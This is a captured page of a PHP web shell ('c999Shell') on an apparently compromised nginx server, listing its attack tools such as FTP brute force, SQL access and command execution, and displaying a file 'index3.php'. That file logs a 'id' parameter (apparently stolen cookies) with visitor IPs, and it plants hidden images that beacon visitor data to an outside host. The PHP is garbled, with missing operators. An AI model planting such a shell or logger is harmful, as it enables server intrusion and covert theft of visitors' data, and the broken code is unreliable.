!c999Shell v. 1.0 pre-release build #16!

Software: nginx. PHP/5.2.17 

uname -a: Linux hosting 2.6 #1 i686 

 

Safe-mode: OFF (not secure)

/   drwxr-xr-x
Free of (0%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index3.php (686 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |


<?php
if(isset($_GET['id'])){
$today date("Y. m. d. G:i:s"); 
$ip gethostbyaddr($_SERVER[REMOTE_ADDR]);
$cookie $_GET['id'];
$log fopen("imglog.txt""a");
fwrite($log,"[".$ip."][".$today."]:\n");
fwrite($log$cookie ."\n");
fclose($log);
}else{
$ip gethostbyaddr($_SERVER[REMOTE_ADDR]);
print('
<style>
img{
display:none;
}
</style>
<script>
x=0;
ll();
function ll(){
x++;
setTimeout("ll()",1);
}
function asd(a){
pic1= new Image(1,1); 
pic1.src="http://iwivv.uw.hu/indexTEST.php?id=TIME: "+x+" IP:'.$ip.'\nSRC: "+a+"\n";
}
</script>
<body>
');

$lines file("links.txt");

foreach($lines as $line)
{
    echo('<img src='.trim($line).' onload=asd(this.src)>');
}

}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::